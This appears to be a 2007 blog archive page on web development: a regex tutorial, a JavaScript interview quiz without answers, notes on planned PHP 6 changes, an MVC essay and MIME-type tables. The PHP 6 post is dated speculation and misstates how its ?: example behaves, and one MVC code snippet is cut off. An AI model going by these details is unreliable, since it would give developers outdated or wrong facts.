Tuesday, October 2, 2007

Regular Expression Tutorial, Learn How to Use and Get The Most out of Regular Expressions

In this tutorial, I will teach you all you need to know to be able to craft powerful time-saving regular expressions. I will start with the most basic concepts, so that you can follow this tutorial even if you know nothing at all about regular expressions yet.

But I will not stop there. I will also explain how a regular expression engine works on the inside, and alert you at the consequences. This will help you to understand quickly why a particular regex does not do what you initially expected. It will save you lots of guesswork and head scratching when you need to write more complex regexes.

What Regular Expressions Are Exactly - Terminology

Basically, a regular expression is a pattern describing a certain amount of text. Their name comes from the mathematical theory on which they are based. But we will not dig into that. Since most people including myself are lazy to type, you will usually find the name abbreviated to regex or regexp. I prefer regex, because it is easy to pronounce the plural "regexes".

On this website, regular expressions are printed as regex. If your browser has proper support for cascading style sheets, the regex should be highlighted in red.

This first example is actually a perfectly valid regex. It is the most basic pattern, simply matching the literal text regex. A "match" is the piece of text, or sequence of bytes or characters that pattern was found to correspond to by the regex processing software. Matches are highlighted in blue on this site.

\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b is a more complex pattern. It describes a series of letters, digits, dots, underscores, percentage signs and hyphens, followed by an at sign, followed by another series of letters, digits and hyphens, finally followed by a single dot and between two and four letters. In other words: this pattern describes an email address.

With the above regular expression pattern, you can search through a text file to find email addresses, or verify if a given string looks like an email address. In this tutorial, I will use the term "string" to indicate the text that I am applying the regular expression to.

I will highlight them in green.
The term "string" or "character string" is used by programmers to indicate a sequence of characters. In practice, you can use regular expressions with whatever data you can access using the application or programming language you are working with.

Different Regular Expression Engines

A regular expression "engine" is a piece of software that can process regular expressions, trying to match the pattern to the given string. Usually, the engine is part of a larger application and you do not access the engine directly. Rather, the application will invoke it for you when needed, making sure the right regular expression is applied to the right file or data.

As usual in the software world, different regular expression engines are not fully compatible with each other. It is not possible to describe every kind of engine and regular expression syntax (or "flavor") in this tutorial. I will focus on the regex flavor used by Perl 5, for the simple reason that this regex flavor is the most popular one, and deservedly so. Many more recent regex engines are very similar, but not identical, to the one of Perl 5. Examples are the open source PCRE engine (used in many tools and languages like PHP), the .NET regular expression library, and the regular expression package included with version 1.4 and later of the Java JDK. I will point out to you whenever differences in regex flavors are important, and which features are specific to the Perl-derivatives mentioned above.

Give Regexes a First Try

You can easily try the following yourself in a text editor that supports regular expressions, such as EditPad Pro. If you do not have such an editor, you can download the free evaluation version of EditPad Pro to try this out. EditPad Pro's regex engine is fully functional in the demo version. As a quick test, copy and paste the text of this page into EditPad Pro. Then select Search|Show Search Panel from the menu. In the search pane that appears near the bottom, type in regex in the box labeled "Search Text". Mark the "Regular expression" checkbox, and click the Find First button. This is the leftmost button on the search panel. See how EditPad Pro's regex engine finds the first match. Click the Find Next button, which sits next to the Find First button, to find further matches. When there are no further matches, the Find Next button's icon will flash briefly.

Now try to search using the regex reg(ular expressions?|ex(p|es)?). This regex will find all names, singular and plural, I have used on this page to say "regex". If we only had plain text search, we would have needed 5 searches. With regexes, we need just one search. Regexes save you time when using a tool like EditPad Pro. Select Count Matches in the Search menu to see how many times this regular expression can match the file you have open in EditPad Pro.

If you are a programmer, your software will run faster since even a simple regex engine applying the above regex once will outperform a state of the art plain text search algorithm searching through the data five times. Regular expressions also reduce development time. With a regex engine, it takes only one line (e.g. in Perl, PHP, Java or .NET) or a couple of lines (e.g. in C using PCRE) of code to, say, check if the user's input looks like a valid email address.

Friday, September 28, 2007

Php, JavaScript & AJAX interview questions

1. Why so JavaScript and Java have similar name?

A. JavaScript is a stripped-down version of Java


B. JavaScript's syntax is loosely based on Java's


C. They both originated on the island of Java


D. None of the above


2. When a user views a page containing a JavaScript program, which machine actually executes the script?


A. The User's machine running a Web browser


B. The Web server


C. A central machine deep within Netscape's corporate offices


D. None of the above


3. ______ JavaScript is also called client-side JavaScript.


A. Microsoft


B. Navigator


C. LiveWire


D. Native


4. __________ JavaScript is also called server-side JavaScript.



A. Microsoft


B. Navigator


C. LiveWire


D. Native


5. What are variables used for in JavaScript Programs?


A. Storing numbers, dates, or other values


B. Varying randomly


C. Causing high-school algebra flashbacks


D. None of the above


6. _____ JavaScript statements embedded in an HTML page can respond to user events such as mouse-clicks, form input, and page navigation.


A. Client-side


B. Server-side


C. Local


D. Native


7. What should appear at the very end of your JavaScript?


The <script LANGUAGE="JavaScript">tag


A. The </script>


B. The <script>


C. The END statement


D. None of the above


8. Which of the following can't be done with client-side JavaScript?


A. Validating a form


B. Sending a form's contents by email


C. Storing the form's contents to a database file on the server


D. None of the above


9. Which of the following are capabilities of functions in JavaScript?


A. Return a value


B. Accept parameters and Return a value


C. Accept parameters


D. None of the above


110. Which of the following is not a valid JavaScript variable name?


A. 2names


B. _first_and_last_names


C. FirstAndLast


D. None of the above


111. ______ tag is an extension to HTML that can enclose any number of JavaScript statements.


A. <SCRIPT>


B. <BODY>


C. <HEAD>


D. <TITLE>


112. How does JavaScript store dates in a date object?


A. The number of milliseconds since January 1st, 1970


B. The number of days since January 1st, 1900


C. The number of seconds since Netscape's public stock offering.


D. None of the above


13. Which of the following attribute can hold the JavaScript version?


A. LANGUAGE


B. SCRIPT


C. VERSION


D. None of the above


14. What is the correct JavaScript syntax to write "Hello World"?


A. System.out.println("Hello World")


B. println ("Hello World")


C. document.write("Hello World")


D. response.write("Hello World")


15. Which of the following way can be used to indicate the LANGUAGE attribute?


A. <LANGUAGE="JavaScriptVersion">


B. <SCRIPT LANGUAGE="JavaScriptVersion">


C. <SCRIPT LANGUAGE="JavaScriptVersion"> JavaScript statements…</SCRIPT>


D. <SCRIPT LANGUAGE="JavaScriptVersion"!> JavaScript statements…</SCRIPT>


16. Inside which HTML element do we put the JavaScript?


A. <js>


B. <scripting>


C. <script>


D. <javascript>


17. What is the correct syntax for referring to an external script called " abc.js"?


A. <script href=" abc.js">


B. <script name=" abc.js">


C. <script src=" abc.js">


D. None of the above


18. Which types of image maps can be used with JavaScript?


A. Server-side image maps


B. Client-side image maps


C. Server-side image maps and Client-side image maps


D. None of the above


19. Which of the following navigator object properties is the same in both Netscape and IE?


A. navigator.appCodeName


B. navigator.appName


C. navigator.appVersion


D. None of the above


20. Which is the correct way to write a JavaScript array?


A. var txt = new Array(1:"tim",2:"kim",3:"jim")


B. var txt = new Array:1=("tim")2=("kim")3=("jim")


C. var txt = new Array("tim","kim","jim")


D. var txt = new Array="tim","kim","jim"


21. What does the <noscript> tag do?


A. Enclose text to be displayed by non-JavaScript browsers.


B. Prevents scripts on the page from executing.


C. Describes certain low-budget movies.


D. None of the above


22. If para1 is the DOM object for a paragraph, what is the correct syntax to change the text within the paragraph?


A. "New Text"?


B. para1.value="New Text";


C. para1.firstChild.nodeValue= "New Text";


D. para1.nodeValue="New Text";


23. JavaScript entities start with _______ and end with _________.


A. Semicolon, colon


B. Semicolon, Ampersand


C. Ampersand, colon


D. Ampersand, semicolon


24. Which of the following best describes JavaScript?


A. a low-level programming language.


B. a scripting language precompiled in the browser.


C. a compiled scripting language.


D. an object-oriented scripting language.


25. Choose the server-side JavaScript object?


A. FileUpLoad


B. Function


C. File


D. Date


26. Choose the client-side JavaScript object?


A. Database


B. Cursor



C. Client


D. FileUpLoad


27. Which of the following is not considered a JavaScript operator?


A. new


B. this


C. delete


D. typeof


28. ______method evaluates a string of JavaScript code in the context of the specified object.


A. Eval


B. ParseInt


C. ParseFloat


D. Efloat


29. Which of the following event fires when the form element loses the focus: <button>, <input>, <label>, <select>, <textarea>?


A. onfocus


B. onblur


C. onclick


D. ondblclick


30. The syntax of Eval is ________________


A. [objectName.]eval(numeric)


B. [objectName.]eval(string)


C. [EvalName.]eval(string)


D. [EvalName.]eval(numeric)


31. JavaScript is interpreted by _________


A. Client


B. Server


C. Object


D. None of the above


32. Using _______ statement is how you test for a specific condition.


A. Select


B. If


C. Switch


D. For


33. Which of the following is the structure of an if statement?


A. if (conditional expression is true) thenexecute this codeend if


B. if (conditional expression is true)execute this codeend if


C. if (conditional expression is true) {then execute this code>->}


D. if (conditional expression is true) then {execute this code}


34. How to create a Date object in JavaScript?


A. dateObjectName = new Date([parameters])


B. dateObjectName.new Date([parameters])


C. dateObjectName := new Date([parameters])


D. dateObjectName Date([parameters])


35. The _______ method of an Array object adds and/or removes elements from an array.


A. Reverse


B. Shift


C. Slice


D. Splice


36. To set up the window to capture all Click events, we use which of the following statement?


A. window.captureEvents(Event.CLICK);


B. window.handleEvents (Event.CLICK);


C. window.routeEvents(Event.CLICK );


D. window.raiseEvents(Event.CLICK );


37. Which tag(s) can handle mouse events in Netscape?


A. <IMG>


B. <A>


C. <BR>


D. None of the above


38. ____________ is the tainted property of a window object.


A. Pathname


B. Protocol


C. Defaultstatus


D. Host


39. To enable data tainting, the end user sets the _________ environment variable.


A. ENABLE_TAINT


B. MS_ENABLE_TAINT


C. NS_ENABLE_TAINT


D. ENABLE_TAINT_NS


40. In JavaScript, _________ is an object of the target language data type that encloses an object of the source language.

A. a wrapper


B. a link


C. a cursor


D. a form


41. When a JavaScript object is sent to Java, the runtime engine creates a Java wrapper of type ___________

A. ScriptObject


B. JSObject


C. JavaObject


D. Jobject


42. _______ class provides an interface for invoking JavaScript methods and examining JavaScript properties.


A. ScriptObject


B. JSObject


C. JavaObject


D. Jobject


43. _________ is a wrapped Java array, accessed from within JavaScript code.


A. JavaArray


B. JavaClass


C. JavaObject


D. JavaPackage


44. A ________ object is a reference to one of the classes in a Java package, such as netscape.javascript .


A. JavaArray


B. JavaClass


C. JavaObject


D. JavaPackage


45. The JavaScript exception is available to the Java code as an instance of __________


A. netscape.javascript.JSObject


B. netscape.javascript.JSException


C. netscape.plugin.JSException


D. None of the above


46. To automatically open the console when a JavaScript error occurs which of the following is added to prefs.js?


A. user_pref(" javascript.console.open_on_error", false);


B. user_pref("javascript.console.open_error ", true);


C. user_pref("javascript.console.open_error ", false);


D. user_pref("javascript.console.open_on_error", true);


47. To open a dialog box each time an error occurs, which of the following is added to prefs.js?


A. user_pref("javascript.classic.error_alerts", true);


B. user_pref("javascript.classic.error_alerts ", false);


C. user_pref("javascript.console.open_on_error ", true);


D. user_pref("javascript.console.open_on_error ", false);


48. The syntax of a blur method in a button object is ______________


A. Blur()


B. Blur(contrast)


C. Blur(value)


D. Blur(depth)


49. The syntax of capture events method for document object is ______________


A. captureEvents()


B. captureEvents(args eventType)


C. captureEvents(eventType)


D. captureEvents(eventVal)


50. The syntax of close method for document object is ______________


A. Close(doc)


B. Close(object)


C. Close(val)


D. Close()

Wednesday, August 29, 2007

Introduce the PHP 6

As you may be aware the core PHP group of developers all met in Paris on November the 11th and 12th 2005. The minutes from the meeting are fascinating reading, but there is a lot to go through. So I've gone through all of the points raised and chewed them over from a developers point of view. Your comments as always are welcome.

Before I get started however I'd just like to make one thing very clear: what you read here (or in the original minutes) are in no way the 'fully 100% decided' end results / changes that we'll see in PHP6. They will most likely all be discussed further (on internals and wider), but even so we can take the information presented in the minutes as being the PHP teams most 'current' way of thinking about any given subject.

Unicode

Unicode support at present can be set on a per request basis. This equates to PHP having to store both Unicode and non-Unicode variants of class, method and function names in the symbol tables. In short - it uses up more resources. Their decision is to make the Unicode setting server wide, not request wide. Turning Unicode off where not required can help performance and they quote some string functions as being up to 300% slower and whole applications 25% slower as a result. The decision to move it to the php.ini in my mind does take the control away from the user, and puts it into the hands of the Web Host.

If you compile PHP yourself or are responsible for this on your servers then you may be interested to know that PHP 6 will require the ICU libs (regardless if Unicode is turned on or off). The build system will bail out if the required ICU libs cannot be found. In a nutshell, you'll have another thing to install if you want to compile PHP.

Register Globals to go

Say goodbye folks, this one is finally going. It will no longer be an ini file setting, and if found it will raise an E_CORE_ERROR, pointing you to the documentation on why it's "bad". This means that PHP6 will finally break all PHP3 era scripts (or any script using reg globals) with no recourse at all but to re-code it. That's a bold move, but a needed one.

Magic Quotes to go

The magic quotes feature of PHP will be going, and as with register globals it's going to raise an E_CORE_ERROR if the setting is found anywhere. This will affect magic_quotes, magic_quotes_sybase and magic_quotes_gpc.

Safe Mode to go

This may please developers who have web hosts that insist upon safe mode! But it will now go totally, again raising an E_CORE_ERROR if found. The reason is that apparently they felt it gave the 'wrong signal', implying that it made PHP secure, when infact it didn't at all. open_basedir will (thankfully) be kept.

'var' to alias 'public'

PHP4 used 'var' within classes. PHP5 (in its OO move) caused this to raise a warning under E_STRICT. This warning will be removed in PHP6 and instead 'var' will mean the same thing as 'public'. This is a nice move but I if anyone has updated their scripts to work under E_STRICT in PHP5 it will be a redundant one for them.

Return by Reference will error

Both '$foo =& new StdClass()' and 'function &foo' will now raise an E_STRICT error.

zend.ze1 compatbility mode to go

ze1 always tried to retain old PHP4 behaviour, but apparently it "doesn't work 100%" anyway, so it will be removed totally and throw an E_CORE_ERROR if detected.

Freetype 1 and GD 1 support to go

Support for both of these (very very old) libs will be removed.

dl() moves to SAPI only

Each SAPI will register the use of this function as required, only the CLI and embed SAPIs will do this from now on. It will not be available elsewhere.

FastCGI always on

The FastCGI code will be cleaned up and always enabled for the CGI SAPI, it will not be able to be disabled.

Register Long Arrays to go

Remember the HTTP_*_VARS globals from yesteryear? Well if you're not already using $_GET, $_POST, etc - start doing so now, because the option to enable long arrays is going (and will throw an E_CORE_ERROR).

Extension Movements

The XMLReader and XMLWriter extensions will move into the core distribution and will be on by default.

The ereg extension will move to PECL (and thus be removed from PHP). This means that PCRE will not be allowed to be disabled. This will make way for the new regular expression extension based on ICU.

The extremely useful Fileinfo exntesion will move into the core distribution and enabled by default.

PHP Engine Additions

64 bit integers
A new 64 bit integer will be added (int64). There will be no int32 (it is assumed unless you specify int64)

Goto
No 'goto' command will be added, but the break keyword will be extended with a static label - so you could do 'break foo' and it'll jump to the label foo: in your code.

ifsetor()
It looks like we won't be seeing this one, which is a shame. But instead the ?: operator will have the 'middle parameter' requirement dropped, which means you'd be able to do something like this: "$foo = $_GET['foo'] ?: 42;" (i.e. if foo is true, $foo will equal 42). This should save some code, but I personally don't think it is as 'readable' as ifsetor would have been.

foreach multi-dim arrays
This is a nice change - you'll be able to foreach through array lists, i.e. "foreach( $a as $k => list($a, $b))".

{} vs []
You can currently use both {} and [] to access string indexes. But the {} notation will raise an E_STRICT in PHP5.1 and will be gone totally in PHP6. Also the [] version will gain substr and array_slice functionality directly - so you could do "[2,]" to access characters 2 to the end, etc. Very handy.

OO changes

Static Binding
A new keyword will be created to allow for late static binding - static::static2(), this will perform runtime evaluation of statics.

Namespaces
It looks like this one is still undecided - if they do implement namespaces it will be using their style only. My advice? Don't hold your breath!

Type-hinted Return Values
Although they decided against allowing type-hinted properties (becaue it's "not the PHP way") they will add support for type-hinted return values, but have yet to decide on a syntax for this. Even so, it will be a nice addition.

Calling dynamic functions as static will E_FATAL
At the moment you can call both static and dynamic methods, whether they are static or not. Calling a dynamic function with the static call syntax will raise an E_FATAL.

Additions to PHP

APC to be in the core distribution
The opcode cache APC will be included in the core distribution of PHP as standard, it will not however be turned on by default (but having it there saves the compilation of yet another thing on your server, and web hosts are more likely to allow it to be enabled)

Hardened PHP patch
This patch implements a bunch of extra security checks in PHP. They went over it and the following changes will now take place within PHP: Protection against HTTP Response Splitting will be included. allow_url_fopen will be split into two: allow_url_fopen and allow_url_include. allow_url_fopen will be enabled by default. allow_url_include will be disabled by default.

E_STRICT merges into E_ALL
Wow, this is quite a serious one! E_STRICT level messages will be added to E_ALL by default. This shows a marked move by the PHP team to educate developers on 'best practises' and displaying language-level warnings in a "Hey, you're doing it the wrong way".

Farewell
They will remove support for the ASP style tags, but the PHP short-code tag will remain (

Conclusion

PHP6 is taking an interesting move in my mind - it's as if the PHP developers want to now educate developers about the right way to code something, and remove those lingering issues with "Well you SHOULD be doing it this way, but you can still do it the old way". This will not be the case any longer. Removing totally the likes of register globals, magic quotes, long arrays, {} string indexes and call-time-pass-by-references will force developers to clean up their code.

It will also break a crapload of scripts beyond repair that doesn't involve some serious re-writing. Is this a bad thing? I don't think so myself, but I see it making the adoption of PHP6 even slower than that of PHP5, which is a real shame. However they have to leap this hurdle at some point, and once they've done it progression to future versions should be swifter.

Model View Controller

The Model View Controller pattern is popular for organizing Web applications. Yet, there is quite a bit of confusion surrounding MVC. What exactly is it? Whatever it is, it must be good. Like object orientation, MVC seems to have earned a halo. It has a reputation for being a good design practice. Therefore, in a strange twist of logic, anyone who creates a good design must be using MVC, right? Much like good practices that have nothing to do with objects are lumped under that general term, good practices that have little to do with MVC are lumped under that term. A precise definition of MVC is probably impossible.

That said, we do have an historical record to fall back on. MVC was introduced as a graphical user interface organizational principle in Smalltalk in the mid-70s. A later paper, “Applications Programming in Smalltalk-80: How to use Model-View-Controller MVC,” describes the Smalltalk implementation. From this and other papers dating from the early Smalltalk years, we can gain insight into the original intent of the MVC pattern.
The original intent of the MVC pattern was to structure an application with a user interface in order to make certain kinds of changes easier. As I discussed in my first column, “Organizing for Change”, it can be a good idea to segregate different kinds of code in an application, based on the changes that one is likely to make for programs with user interfaces, it is generally considered a good idea to separate the user interface related code from the domain-related code. This is because those kinds of code tend to change for different reasons and at different times. Separating the two allows the programmer to make a change in one without having to touch the other.

Separating the user interface from the domain logic also allows one implementation to be swapped with another. Different views and controllers can be substituted to provide alternate user interfaces for the same model. For example, the same model data can be displayed as a bar graph, or a pie chart, or a spreadsheet. But wait! The Model View Controller pattern has three segments. To separate the user interface from the do-main logic, it would seem that only two would be needed. Why three? This goes back to the original metaphor upon which MVC is based. Conceptually, MVC is intended to replicate an abstract data processing model. In that model, data is fed into a computer as input. A processor uses that data to perform some task. Then some kind of output is produced. Notice that there are three stages in that process. These three stages correspond to the model, view, and controller segmentation of the MVC pattern. Perhaps the most obvious correspondence is the view. This is obviously the output portion of the program. Working back from the end of the process, the model segment of the program corresponds to the processing component. Unfortunately, when may people think of the word ’model’, they think of data, nouns and structure. In MVC, ’model’ corresponds to ’processor’. You should also think in terms of verbs when you think of the model. The model is where the stuff gets done that the program is designed to do. The remaining segment, and the one that seems most confusing, is the controller. The controller corresponds to the input phase of our data processing abstraction. It receives input and translates that input to requests on the model or the view. Why is the controller so confusing? Well, if your model is verb shy, you have to put the behavioral aspect of your domain logic somewhere. Often people will separate out the view or output logic, separate out the data storage logic, and then consider that anything else left must be the controller, right? Well, no. You see, while MVC is a way of separating the user interface from the domain logic, not every way of achieving this separation is MVC. Not every method of structuring a user interface is MVC. In Smalltalk MVC, the idea of having a separate controller layer for input allows an input method to be changed without changing either the view or the model. For example, in a spreadsheet program, a different controller would handle mouse input or handle keyboard input, but the model and view objects would be the same. Fair enough, but how many times in a Web application do you want to swap out input methods without also changing the corresponding output? There is a strong coupling between the input and output methods of a program. It can be hard to change one without changing the other. Another common UI organization pattern is called Document/View. Document/View collapses the input and output layers of MVC into a single view layer. Document/View is a good way of separating your user interface from domain logic, but it is not MVC. We pay a price for dividing our applications into three Parts.

The Model

The model encapsulates the functional core of an application, its domain logic. The goal of MVC is to make the model independent of the view and controller, which together form the user interface of the application. A model could conceivably be used with multiple different view-controller interface pairings. Since the model must be independent, it cannot refer to either the view or controller portions of the application. The model may not hold direct instance variables that refer to the view or the controller. It passively supplies its services and data to the other layers of the application. In fact, there is a variation on the model layer typically used with Web applications, called a passive model. With a passive model, the objects used in the model are completely unaware of being used in the MVC triad. The controller notifies the view when it executes an operation on the model that will require the view to be updated. In another version more traditional to MVC, the active model, model classes define a change notification mechanism, typically using the Observer pattern. This allows unrelated view and controller components to be notified when the model has changed. Since these components register themselves with the model, and the model has no knowledge of any specific view or controller, this does not break the independence of the model. This notification mechanism is behind the immediate updating that is the hallmark of a MVC GUI application. The passive model is commonly used in Web MVC. The strict request/response cycle of HTTP does not require the immediacy of an active model. The view is always rendered anew on every cycle, regardless of changes. This may be especially true in PHP, where no state is retained between requests.

The View

The view obtains data from the model and presents it to the user. It represents the output of the application. The view can be implemented using a variety of techniques, including templates, or a transformative method like XSL. One major misconception I see in beginner questions about MVC is that the view must somehow remain separate from the model. This line of thinking causes frustration with MVC. Programmers end up creating controllers that shuffle data from the model into the view. This is unnecessary. The view usually has a direct dependency on the model. If you change the model, you must also change the view. Because the view depends on the model, the view can generally have free access to the model. Well, almost free access. Views are read-only representations of the state of the model. They should not attempt to modify the model; this would be a violation of the MVC separation. Attempting to modify the model in the view would indicate a mixing of controller code into the view layer. A far more common and insidious violation of separations occurs when domain model code leaks into the view. For example, consider the requirement “Show negative balances in red.” At first glance, this appears to be strictly an output requirement and a test might be placed into the view in roughly this form: if balance <>

Can you spot the violation of separations? Upon further analysis, it turns out that the real requirement is “show overdrawn balances in red.” The definition of overdrawn, here balance <>, belongs in the domain model, not in the view. In this way, changes to the definition of ’overdrawn’ can be made independently of decisions about how to display the status of being overdrawn.

The Controller

The controller receives and translates input to requests on the model or view. Controllers are typically responsible for calling methods on the model that change the state of the model. In an active model, this state change is then reflected in the view via the change propagation mechanism. A passive model shifts more responsibility into the controller, as the controller must notify the views when they should update. In traditional Smalltalk MVC, views and controllers are tightly coupled. Each view instance is associated with a single unique controller instance, and vice versa. The controller is considered a strategy that the view uses for input. The view is also responsible for creating new views and controllers. Modern Web usage of MVC shifts even more of the traditional responsibilities of the view to the controller. The controller becomes responsible for creating and selecting views, and the view tends to lose responsibility for its controller. Sometimes, responsibility for creating and selecting views is delegated to a specific object; this is known as the Application Controller pattern for Web MVC, or the View Handler pattern for GUI MVC. You can see that, as with the view, the controller also has a direct dependency on the model. Changes to the model layer will often trigger corresponding changes in the controller layer. Of course, the reverse should not be true. Unfortunately, as with the view, it is easy for domain logic to leak out of the domain layer and into the controller. This is especially true when the domain model is considered to be passive, verb-deprived data. This is a big challenge for modern MVC frameworks for the Web. The controller can be an inviting place for quick and dirty unstructured code.

Thursday, August 16, 2007

Mime Types

MIME Types By Content Type

Type/sub-type Extension
application/envoy evy
application/fractals fif
application/futuresplash spl
application/hta hta
application/internet-property-stream acx
application/mac-binhex40 hqx
application/msword doc
application/msword dot
application/octet-stream *
application/octet-stream bin
application/octet-stream class
application/octet-stream dms
application/octet-stream exe
application/octet-stream lha
application/octet-stream lzh
application/oda oda
application/olescript axs
application/pdf pdf
application/pics-rules prf
application/pkcs10 p10
application/pkix-crl crl
application/postscript ai
application/postscript eps
application/postscript ps
application/rtf rtf
application/set-payment-initiation setpay
application/set-registration-initiation setreg
application/vnd.ms-excel xla
application/vnd.ms-excel xlc
application/vnd.ms-excel xlm
application/vnd.ms-excel xls
application/vnd.ms-excel xlt
application/vnd.ms-excel xlw
application/vnd.ms-outlook msg
application/vnd.ms-pkicertstore sst
application/vnd.ms-pkiseccat cat
application/vnd.ms-pkistl stl
application/vnd.ms-powerpoint pot
application/vnd.ms-powerpoint pps
application/vnd.ms-powerpoint ppt
application/vnd.ms-project mpp
application/vnd.ms-works wcm
application/vnd.ms-works wdb
application/vnd.ms-works wks
application/vnd.ms-works wps
application/winhlp hlp
application/x-bcpio bcpio
application/x-cdf cdf
application/x-compress z
application/x-compressed tgz
application/x-cpio cpio
application/x-csh csh
application/x-director dcr
application/x-director dir
application/x-director dxr
application/x-dvi dvi
application/x-gtar gtar
application/x-gzip gz
application/x-hdf hdf
application/x-internet-signup ins
application/x-internet-signup isp
application/x-iphone iii
application/x-javascript js
application/x-latex latex
application/x-msaccess mdb
application/x-mscardfile crd
application/x-msclip clp
application/x-msdownload dll
application/x-msmediaview m13
application/x-msmediaview m14
application/x-msmediaview mvb
application/x-msmetafile wmf
application/x-msmoney mny
application/x-mspublisher pub
application/x-msschedule scd
application/x-msterminal trm
application/x-mswrite wri
application/x-netcdf cdf
application/x-netcdf nc
application/x-perfmon pma
application/x-perfmon pmc
application/x-perfmon pml
application/x-perfmon pmr
application/x-perfmon pmw
application/x-pkcs12 p12
application/x-pkcs12 pfx
application/x-pkcs7-certificates p7b
application/x-pkcs7-certificates spc
application/x-pkcs7-certreqresp p7r
application/x-pkcs7-mime p7c
application/x-pkcs7-mime p7m
application/x-pkcs7-signature p7s
application/x-sh sh
application/x-shar shar
application/x-shockwave-flash swf
application/x-stuffit sit
application/x-sv4cpio sv4cpio
application/x-sv4crc sv4crc
application/x-tar tar
application/x-tcl tcl
application/x-tex tex
application/x-texinfo texi
application/x-texinfo texinfo
application/x-troff roff
application/x-troff t
application/x-troff tr
application/x-troff-man man
application/x-troff-me me
application/x-troff-ms ms
application/x-ustar ustar
application/x-wais-source src
application/x-x509-ca-cert cer
application/x-x509-ca-cert crt
application/x-x509-ca-cert der
application/ynd.ms-pkipko pko
application/zip zip
audio/basic au
audio/basic snd
audio/mid mid
audio/mid rmi
audio/mpeg mp3
audio/x-aiff aif
audio/x-aiff aifc
audio/x-aiff aiff
audio/x-mpegurl m3u
audio/x-pn-realaudio ra
audio/x-pn-realaudio ram
audio/x-wav wav
image/bmp bmp
image/cis-cod cod
image/gif gif
image/ief ief
image/jpeg jpe
image/jpeg jpeg
image/jpeg jpg
image/pipeg jfif
image/svg+xml svg
image/tiff tif
image/tiff tiff
image/x-cmu-raster ras
image/x-cmx cmx
image/x-icon ico
image/x-portable-anymap pnm
image/x-portable-bitmap pbm
image/x-portable-graymap pgm
image/x-portable-pixmap ppm
image/x-rgb rgb
image/x-xbitmap xbm
image/x-xpixmap xpm
image/x-xwindowdump xwd
message/rfc822 mht
message/rfc822 mhtml
message/rfc822 nws
text/css css
text/h323 323
text/html htm
text/html html
text/html stm
text/iuls uls
text/plain bas
text/plain c
text/plain h
text/plain txt
text/richtext rtx
text/scriptlet sct
text/tab-separated-values tsv
text/webviewhtml htt
text/x-component htc
text/x-setext etx
text/x-vcard vcf
video/mpeg mp2
video/mpeg mpa
video/mpeg mpe
video/mpeg mpeg
video/mpeg mpg
video/mpeg mpv2
video/quicktime mov
video/quicktime qt
video/x-la-asf lsf
video/x-la-asf lsx
video/x-ms-asf asf
video/x-ms-asf asr
video/x-ms-asf asx
video/x-msvideo avi
video/x-sgi-movie movie
x-world/x-vrml flr
x-world/x-vrml vrml
x-world/x-vrml wrl
x-world/x-vrml wrz
x-world/x-vrml xaf
x-world/x-vrml xof


Mime Types By File Extension

Extension Type/sub-type
application/octet-stream
323 text/h323
acx application/internet-property-stream
ai application/postscript
aif audio/x-aiff
aifc audio/x-aiff
aiff audio/x-aiff
asf video/x-ms-asf
asr video/x-ms-asf
asx video/x-ms-asf
au audio/basic
avi video/x-msvideo
axs application/olescript
bas text/plain
bcpio application/x-bcpio
bin application/octet-stream
bmp image/bmp
c text/plain
cat application/vnd.ms-pkiseccat
cdf application/x-cdf
cer application/x-x509-ca-cert
class application/octet-stream
clp application/x-msclip
cmx image/x-cmx
cod image/cis-cod
cpio application/x-cpio
crd application/x-mscardfile
crl application/pkix-crl
crt application/x-x509-ca-cert
csh application/x-csh
css text/css
dcr application/x-director
der application/x-x509-ca-cert
dir application/x-director
dll application/x-msdownload
dms application/octet-stream
doc application/msword
dot application/msword
dvi application/x-dvi
dxr application/x-director
eps application/postscript
etx text/x-setext
evy application/envoy
exe application/octet-stream
fif application/fractals
flr x-world/x-vrml
gif image/gif
gtar application/x-gtar
gz application/x-gzip
h text/plain
hdf application/x-hdf
hlp application/winhlp
hqx application/mac-binhex40
hta application/hta
htc text/x-component
htm text/html
html text/html
htt text/webviewhtml
ico image/x-icon
ief image/ief
iii application/x-iphone
ins application/x-internet-signup
isp application/x-internet-signup
jfif image/pipeg
jpe image/jpeg
jpeg image/jpeg
jpg image/jpeg
js application/x-javascript
latex application/x-latex
lha application/octet-stream
lsf video/x-la-asf
lsx video/x-la-asf
lzh application/octet-stream
m13 application/x-msmediaview
m14 application/x-msmediaview
m3u audio/x-mpegurl
man application/x-troff-man
mdb application/x-msaccess
me application/x-troff-me
mht message/rfc822
mhtml message/rfc822
mid audio/mid
mny application/x-msmoney
mov video/quicktime
movie video/x-sgi-movie
mp2 video/mpeg
mp3 audio/mpeg
mpa video/mpeg
mpe video/mpeg
mpeg video/mpeg
mpg video/mpeg
mpp application/vnd.ms-project
mpv2 video/mpeg
ms application/x-troff-ms
mvb application/x-msmediaview
nws message/rfc822
oda application/oda
p10 application/pkcs10
p12 application/x-pkcs12
p7b application/x-pkcs7-certificates
p7c application/x-pkcs7-mime
p7m application/x-pkcs7-mime
p7r application/x-pkcs7-certreqresp
p7s application/x-pkcs7-signature
pbm image/x-portable-bitmap
pdf application/pdf
pfx application/x-pkcs12
pgm image/x-portable-graymap
pko application/ynd.ms-pkipko
pma application/x-perfmon
pmc application/x-perfmon
pml application/x-perfmon
pmr application/x-perfmon
pmw application/x-perfmon
pnm image/x-portable-anymap
pot, application/vnd.ms-powerpoint
ppm image/x-portable-pixmap
pps application/vnd.ms-powerpoint
ppt application/vnd.ms-powerpoint
prf application/pics-rules
ps application/postscript
pub application/x-mspublisher
qt video/quicktime
ra audio/x-pn-realaudio
ram audio/x-pn-realaudio
ras image/x-cmu-raster
rgb image/x-rgb
rmi audio/mid
roff application/x-troff
rtf application/rtf
rtx text/richtext
scd application/x-msschedule
sct text/scriptlet
setpay application/set-payment-initiation
setreg application/set-registration-initiation
sh application/x-sh
shar application/x-shar
sit application/x-stuffit
snd audio/basic
spc application/x-pkcs7-certificates
spl application/futuresplash
src application/x-wais-source
sst application/vnd.ms-pkicertstore
stl application/vnd.ms-pkistl
stm text/html
svg image/svg+xml
sv4cpio application/x-sv4cpio
sv4crc application/x-sv4crc
swf application/x-shockwave-flash
t application/x-troff
tar application/x-tar
tcl application/x-tcl
tex application/x-tex
texi application/x-texinfo
texinfo application/x-texinfo
tgz application/x-compressed
tif image/tiff
tiff image/tiff
tr application/x-troff
trm application/x-msterminal
tsv text/tab-separated-values
txt text/plain
uls text/iuls
ustar application/x-ustar
vcf text/x-vcard
vrml x-world/x-vrml
wav audio/x-wav
wcm application/vnd.ms-works
wdb application/vnd.ms-works
wks application/vnd.ms-works
wmf application/x-msmetafile
